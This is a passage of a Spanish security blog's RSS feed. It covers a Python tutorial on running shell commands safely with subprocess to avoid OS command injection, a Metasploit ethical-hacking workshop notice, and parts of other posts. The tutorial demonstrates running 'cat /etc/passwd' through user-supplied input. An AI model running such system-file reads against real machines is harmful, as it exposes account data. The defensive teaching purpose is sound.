/&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;[ References ]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;https://opensource.srlabs.de/projects/snoopsnitch&lt;br /&gt;&lt;br /&gt;http://gsmmap.org/#!/about&lt;br /&gt;&lt;br /&gt;https://play.google.com/store/apps/details?id=de.srlabs.snoopsnitch&lt;br /&gt;&lt;br /&gt;https://play.google.com/store/apps/details?id=de.srlabs.gsmmap&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/04/gsmmap-snoopsnitch-android-app-to-mobile.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-2OrEh-j1-Ak/VSeG_y1abtI/AAAAAAAAdXw/exmbI_9_8yY/s72-c/Mobile_ST2_Head.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-8349739277471849143</guid><pubDate>Thu, 02 Apr 2015 11:36:00 +0000</pubDate><atom:updated>2015-04-06T14:43:55.231+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Commands</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Programacion</category><category domain="http://www.blogger.com/atom/ns#">PYH1</category><category domain="http://www.blogger.com/atom/ns#">Python</category><category domain="http://www.blogger.com/atom/ns#">Run</category><category domain="http://www.blogger.com/atom/ns#">Shell</category><title>Python para Hacking (I) - Run a secure Shell command </title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-BJQsB2vDZ0s/VR0pnIsgxZI/AAAAAAAAdUs/1fCx3avJXe0/s1600/ST2Labs_Hacking_IV_head.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-BJQsB2vDZ0s/VR0pnIsgxZI/AAAAAAAAdUs/1fCx3avJXe0/s1600/ST2Labs_Hacking_IV_head.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ahora que estoy de vacaciones (bendita semana santa) he sacado un hueco para terminar uno de los muchos artículos que tengo pensado escribir sobre el lenguaje de programación &lt;b&gt;python, &lt;/b&gt;donde a pesar de ser yo un recién llegado al mundo python, ya me siento extremadamente cómodo programando en python, hasta tal punto que se ha convertido en mi lenguaje favorito.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En artículos anteriores os hable de como usar python como lenguaje de Hacking, al hilo de los mismos, os voy a introducir en algunos conceptos y/o comandos de python de utilidad en el área de la Seguridad Informática, como por ejemplo ejecutar comandos del sistema de forma segura (evitando inyección arbitraria de comandos) desde un programa escrito en python.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Introducción&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Cuando aprendes a programar lo habitual es empezar con el lenguaje pseudo-código y C, en mi experiencia programando, de C pase a emsablador Morotorla 6880 y luego C++; en el momento que empiezas a utilizar la programación orientada a Objetos descubres los beneficios e inconvenientes de los cuales no os voy a hablar. Lo mejor de python es la flexibilidad, rapidez e ingente cantidad de recursos disponibles con los que contar.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Tras probar varios lenguajes de programación (con sus contras y sus pros) me quedo con python, siendo este el inicio de una serie de artículos o publicaciones, donde os mostrare algunos&amp;nbsp;ejemplos prácticos de programación en python (orientados a hacking), como es el caso de éste artículo, donde vamos a ver como leer los puertos abiertos del sistema (listening port).&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;¿ Por donde empiezo ?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Existen al menos tres maneras distintas de ejecutar un comando del sistema desde un programa escrito en python, la primera es utilizando las librerías del sistema &lt;b&gt;os,&amp;nbsp;&lt;/b&gt;la segunda, utilizando la librería &lt;b&gt;&lt;a href=&quot;https://docs.python.org/2/library/subprocess.html&quot; target=&quot;_blank&quot;&gt;subprocess&lt;/a&gt; &lt;/b&gt;y la tercera, es utilizando la librería &lt;b&gt;commands.&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Vamos a ilustrar con algunos ejemplos prácticos la utilización de las diferentes librerías.&amp;nbsp;Sin embargo, tanto como la librerías commands, como la librería os, ha sido sustituidas por subprocess, por lo que centraré los ejemplos en &lt;b&gt;subprocess&lt;/b&gt;.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;Nota: Los ejemplos estan preparados para funcionar solamente en sistemas UNIX,&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;No obstante, las librerías commands, y os, ha sido sustituidas por subprocess.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Ejemplo 1&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;Ejecutar cualquier comando del sistema a través de un programa escrito con python (run a system command through python script), en el ejemplo se ha utilizado &quot;ls -lsa&quot;, para listar el contenido de un directorio.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CODE_&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-zgjzJWXXXH8/VR0n5Hnok3I/AAAAAAAAdUc/Atf9DsQlUYE/s1600/ST2Labs_Hacking_IV_e1_2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-zgjzJWXXXH8/VR0n5Hnok3I/AAAAAAAAdUc/Atf9DsQlUYE/s1600/ST2Labs_Hacking_IV_e1_2.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Example python code - &lt;b&gt;e1-py&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;OUT_&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-ySDmH4L9pM4/VR0dkD80nHI/AAAAAAAAdT4/W1kgZxMhsFY/s1600/ST2Labs_Hacking_IV_e1_1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-ySDmH4L9pM4/VR0dkD80nHI/AAAAAAAAdT4/W1kgZxMhsFY/s1600/ST2Labs_Hacking_IV_e1_1.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Example 1: e1.py - Run system command from python&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;b&gt;Nota:&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;last&quot; style=&quot;display: inline; font-family: sans-serif; line-height: 20.7999992370605px; margin-bottom: 5px;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;Passing&amp;nbsp;&lt;tt class=&quot;docutils literal&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: #efc2c2; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; padding: 0px 1px;&quot;&gt;&lt;span class=&quot;pre&quot;&gt;shell=True&lt;/span&gt;&lt;/tt&gt;&amp;nbsp;can be a security hazard if combined with untrusted input (&lt;a href=&quot;https://docs.python.org/2/library/subprocess.html&quot; target=&quot;_blank&quot;&gt;read about&lt;/a&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Ejemplo 2&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Ejecuta cualquier comando introducido por el usuario desde el teclado o STDIN !&lt;br /&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-oy0slw-IQpo/VR0n5CtD54I/AAAAAAAAdUg/4bUk-5FCTkE/s1600/ST2Labs_Hacking_IV_e2_2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-oy0slw-IQpo/VR0n5CtD54I/AAAAAAAAdUg/4bUk-5FCTkE/s1600/ST2Labs_Hacking_IV_e2_2.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Example python code - &lt;b&gt;e2.py&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Nota:&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;last&quot; style=&quot;display: inline; font-family: sans-serif; line-height: 20.7999992370605px; margin-bottom: 5px;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;Passing&amp;nbsp;&lt;tt class=&quot;docutils literal&quot; style=&quot;background-attachment: initial; background-clip: initial; background-color: #efc2c2; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; padding: 0px 1px;&quot;&gt;&lt;span class=&quot;pre&quot;&gt;shell=True&lt;/span&gt;&lt;/tt&gt;&amp;nbsp;can be a security hazard if combined with untrusted input&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: sans-serif; font-size: x-small; line-height: 20.7999992370605px;&quot;&gt;(&lt;/span&gt;&lt;a href=&quot;https://docs.python.org/2/library/subprocess.html&quot; style=&quot;font-family: sans-serif; font-size: small; line-height: 20.7999992370605px;&quot; target=&quot;_blank&quot;&gt;read about&lt;/a&gt;&lt;span style=&quot;font-family: sans-serif; font-size: x-small; line-height: 20.7999992370605px;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;b&gt;OUT_&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;Running cat /etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-6iP3vxwFuOo/VR0dkLHYEjI/AAAAAAAAdUE/7od_lSLH7pA/s1600/ST2Labs_Hacking_IV_e2_1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-6iP3vxwFuOo/VR0dkLHYEjI/AAAAAAAAdUE/7od_lSLH7pA/s1600/ST2Labs_Hacking_IV_e2_1.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Example 2: run cat /etc/passwd command from python code&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Ejemplo 3:&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Ejecutar y mostrar el resultado de listar los archivos de un directorio &quot;ls -ls&quot;, utilizando parametrización del comando y usando tuberías en lugar de ejecución directa en la SHELL, es una forma más segura de ejecutar comandos directamente en sistema, evitando ataques de COMMAND OS Injection sobre vuestro código, claro esta que esto es meramente un ejemplo didáctico y las diferencias entre los ejemplos son minimamente significativas.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;CODE_&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-N_McuZNNVHI/VR0n5FoCaXI/AAAAAAAAdUY/8oJx8nBkRqc/s1600/ST2Labs_Hacking_IV_e3_2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://4.bp.blogspot.com/-N_McuZNNVHI/VR0n5FoCaXI/AAAAAAAAdUY/8oJx8nBkRqc/s1600/ST2Labs_Hacking_IV_e3_2.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Example python code - &lt;b&gt;e3.py&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;Ejecución&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;ST2Labs &amp;gt; python e3.py&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;OUT_&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-Bsa5Qwq45gQ/VR0dYJhKxNI/AAAAAAAAdT0/Stde-8S6sO4/s1600/ST2Labs_Hacking_IV_e3_1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-Bsa5Qwq45gQ/VR0dYJhKxNI/AAAAAAAAdT0/Stde-8S6sO4/s1600/ST2Labs_Hacking_IV_e3_1.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Example 3 - Run a secure system command.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Todos los ejemplos los puedes descargar desde mi repositorio ST2Labs en GitHub (https://github.com/ST2Labs/ST2Example).&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;#ST2Labs&lt;/b&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/04/python-para-hacking-1-run-secure-shell.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-BJQsB2vDZ0s/VR0pnIsgxZI/AAAAAAAAdUs/1fCx3avJXe0/s72-c/ST2Labs_Hacking_IV_head.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-1420971566938853164</guid><pubDate>Fri, 23 Jan 2015 10:07:00 +0000</pubDate><atom:updated>2015-01-23T11:08:21.873+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ACSiSecurity</category><category domain="http://www.blogger.com/atom/ns#">ANTPJI</category><category domain="http://www.blogger.com/atom/ns#">Hackin</category><category domain="http://www.blogger.com/atom/ns#">Madrid</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">Taller</category><category domain="http://www.blogger.com/atom/ns#">UDIMA</category><title>Taller de Iniciación al Hacking Ético</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-LXDkHIYNdDk/VMIdY7zQsHI/AAAAAAAAcqo/Aqn2pjoSgYs/s1600/st2_taller_hacking.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-LXDkHIYNdDk/VMIdY7zQsHI/AAAAAAAAcqo/Aqn2pjoSgYs/s1600/st2_taller_hacking.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;Hola a tod@s&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Hace tiempo que no escribo ningún artículo, esto no es por falta de ganas, sino más bien de tiempo (muchas ideas se pasan a diario por mi cabeza, y muchas otras historias sobre las que me gustaría escribir) pero aquí estoy escribiendo estas lineas sobre mi participación en el próximo Taller de Hacking Ético que organización &lt;a href=&quot;http://www.antpji.com/antpji2013/index.php/661-taller-de-iniciacion-al-hacking-etico&quot; target=&quot;_blank&quot;&gt;Asociación Nacional de Tasadores y Peritos Informáticos Judiciales&lt;/a&gt; , junto a &lt;a href=&quot;http://www.udima.es/&quot; target=&quot;_blank&quot;&gt;UDIMA&lt;/a&gt; (Universidad a Distancia de Madrid) y &lt;a href=&quot;http://www.aconsaseguridad.com/&quot; target=&quot;_blank&quot;&gt;Aconsa Seguridad&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Fruto de ese trabajo diario, tengo el placer de anunciaros que la &lt;a href=&quot;https://www.facebook.com/antpji&quot; target=&quot;_blank&quot;&gt;Asociación Nacional de Tasadores y Peritos Informáticos Judiciales&lt;/a&gt; ha organizado una excelente ocasión de aprender técnicas de Hacking de los profesores del &lt;a href=&quot;http://www.antpji.com/antpji2013/index.php/formacion/curso-de-hacking-etico-en-sistemas-y-redes&quot; target=&quot;_blank&quot;&gt;Curso sobre Hacking Ético&lt;/a&gt; que ofertan.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-kR6G40FuoVI/VMIaFztcdwI/AAAAAAAAcqg/Gz6Obgv-5eA/s1600/Taller_AUDIMA.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-kR6G40FuoVI/VMIaFztcdwI/AAAAAAAAcqg/Gz6Obgv-5eA/s1600/Taller_AUDIMA.jpg&quot; height=&quot;640&quot; width=&quot;452&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;Mi participación será con un Taller exclusivo sobre Metasploit, para ofrecer a los alumnos la visión y posibilidad que ofrece la herramienta, siempre con el punto de vista puesto en el enfoque practico.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;INFORMACIÓN DEL TALLER&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Fecha: 30 y 31 de Enero 2015&lt;br /&gt;&lt;br /&gt;Lugar: C/ Melilla 19, Centro de Estudio Tecnológicos&lt;br /&gt;&lt;br /&gt;Precio:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Socios ANTPJI 100€&lt;/li&gt;&lt;li&gt;Profesionales 300€&lt;/li&gt;&lt;li&gt;&lt;b&gt;Alumnos del Master en Informática Forense y Delitos Informáticos, Hacking Ético en Sistemas y Redes. GRATUITO&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Viernes 30 de Enero 2014&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;16:00 a 18:00h &quot;Metodología de ataques digitales en el mundo real&quot; a cargo de D. Roberto Peña&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;18:00 a 20:00h &quot;Taller de Metasploit&quot; a cargo de D. Julian Gonzalez&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Sábado 31 de Enero 2014&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;10:00 a 12:00h &quot;Taller de Auditoría de Sistemas en entornos web&quot; a cargo de D. Raul Morales&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;No te pierdas este taller de iniciación al Hacking Ético donde tendras la oportunidad no solo de aprender las bases del Hacking Ético, sino también conocer a los profesor del curso universitario de Hacking Ético en Sistemas y Redes que inicia el próximo 2 de febrero.&lt;/div&gt;&lt;div style=&quot;background-color: white; color: #68615d; font-family: DroidSerifRegular; font-size: 14px; line-height: 20px; margin-bottom: 15px; margin-top: 15px;&quot;&gt;&lt;a href=&quot;http://www.antpji.com/antpji2013/index.php/talleres/taller-iniciacion-al-hacking-etico/inscripcion&quot; style=&quot;-webkit-transition: color 0.2s ease-in-out; color: #ef7885; outline: none; text-decoration: none; transition: color 0.2s ease-in-out;&quot; title=&quot;Hacking Etico ANTPJI&quot;&gt;INSCRIBETE AL TALLER&lt;/a&gt;&lt;/div&gt;#ST2Labs&lt;br /&gt;&lt;a href=&quot;https://twitter.com/rhodius&quot; target=&quot;_blank&quot;&gt;@rhodius&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://twitter.com/st2labs&quot; target=&quot;_blank&quot;&gt;@st2labs&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://twitter.com/seguridadxato2&quot; target=&quot;_blank&quot;&gt;@seguridadparatodos&lt;/a&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/01/taller-de-iniciacion-al-hacking-etico.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-LXDkHIYNdDk/VMIdY7zQsHI/AAAAAAAAcqo/Aqn2pjoSgYs/s72-c/st2_taller_hacking.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-2714715137924658473</guid><pubDate>Tue, 30 Dec 2014 11:31:00 +0000</pubDate><atom:updated>2014-12-30T12:31:58.254+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">2015</category><category domain="http://www.blogger.com/atom/ns#">Ciberseguridad</category><category domain="http://www.blogger.com/atom/ns#">Clases</category><category domain="http://www.blogger.com/atom/ns#">Feliz</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">IV</category><category domain="http://www.blogger.com/atom/ns#">Master</category><category domain="http://www.blogger.com/atom/ns#">Navidad</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">Seclabs</category><category domain="http://www.blogger.com/atom/ns#">Seguridad</category><category domain="http://www.blogger.com/atom/ns#">ST2</category><category domain="http://www.blogger.com/atom/ns#">ST2Blog</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">STIC</category><category domain="http://www.blogger.com/atom/ns#">Web</category><title>Feliz IV Navidad | Merry xMaS</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-NfS723nBRrU/VKKKj8dWomI/AAAAAAAAcLg/ZpD84ZDJfUg/s1600/MerryXmas.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-NfS723nBRrU/VKKKj8dWomI/AAAAAAAAcLg/ZpD84ZDJfUg/s1600/MerryXmas.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Ya son las IV (4) Navidades juntos !!!!!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;¡Cómo pasa el tiempo¡ , sigo y seguiré compartiendo los buenos momentos con todos vosotros a través del Blog y Twitter &lt;a href=&quot;https://twitter.com/seguridadxato2&quot; target=&quot;_blank&quot;&gt;@seguridadxato2&lt;/a&gt; &lt;a href=&quot;https://twitter.com/st2labs&quot; target=&quot;_blank&quot;&gt;@st2labs&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: 